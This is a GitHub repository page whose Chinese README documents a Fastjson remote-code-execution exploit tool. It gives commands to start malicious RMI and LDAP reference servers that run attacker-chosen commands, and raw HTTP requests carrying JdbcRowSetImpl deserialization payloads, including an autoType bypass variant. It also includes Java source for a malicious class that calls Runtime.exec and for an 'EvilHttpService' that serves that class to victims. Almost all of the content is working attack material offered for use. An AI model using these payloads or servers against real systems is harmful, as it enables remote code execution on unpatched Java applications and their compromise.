Skip to content
/ fastjson_rce_tool Public
forked from wyzxxz/jndi_tool

fastjson_rce工具,不用搭建HTTP服务,不受JDK版本限制

2 stars 318 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Hacker-One/fastjson_rce_tool

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits
2.png
2.png
 
 
README.md
README.md
 
 
fastjson_tool.jar
fastjson_tool.jar
 
 
work.png
work.png
 
 

Repository files navigation

fastjson_rce_tool


rmi:
1. 启动RMI服务,后面写要执行的语句(有依赖,tomcat8稳定复现)
java -cp fastjson_tool.jar EvilRMIServer 8888 53 "curl dnslog.wyzxxz.cn"

2. 发送请求包
POST /test HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) 

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:8888/Object","autoCommit":true}

3. 查看日志是否curl成功

===================================================================================================

ldap:
1. 启动LDAP服务,后面写要执行的语句
java -cp fastjson_tool.jar LDAPRefServer2 8888 CommonsCollections1 "curl dnslog.cn"

2. 发送请求包
POST /test HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) 

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1:8888/Object","autoCommit":true}


3. 查看日志是否执行成功

===================================================================================================
else:

有些环境可能利用不成功,可以尝试默认的测试方法,
例如:
生成测试的class文件,
import java.lang.Runtime;
import java.lang.Process;

public class Object {
    public Object() throws Exception {
        Runtime.getRuntime().exec("curl dnslog.cn");
   }
}
javac Object.java

启动http服务器
import java.io.*;
import java.net.*;
import com.sun.net.httpserver.*;

public class EvilHttpService {
    public static void main(String[] args) {
        try {
            String serverAddress = args[0];
            int localport = Integer.parseInt(args[1]);
            System.out.println("Starting HTTP server");
            HttpServer httpServer = HttpServer.create(new InetSocketAddress(localport), 0);
            httpServer.createContext("/",new HttpFileHandler());
            httpServer.setExecutor(null);
            httpServer.start();
            System.out.println("\nEvilobject: http://"+serverAddress+":"+localport+"/Object.class");

        } catch(Exception e) {
            e.printStackTrace();
        }
    }
}

java EvilHttpService ip port

启动ldap服务,从http服务获取class
java -cp fastjson_tool.jar LDAPRefServer http://ip:port/#Object 8888

查询执行结果


=======================================================
最常用的2个如下:
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1:8888/Object","autoCommit":true}

{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1:8888/Object","autoCommit":true}}

0

1

About

fastjson_rce工具,不用搭建HTTP服务,不受JDK版本限制

Topics

exp fastjson fastjson-rce fastjson-exp

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published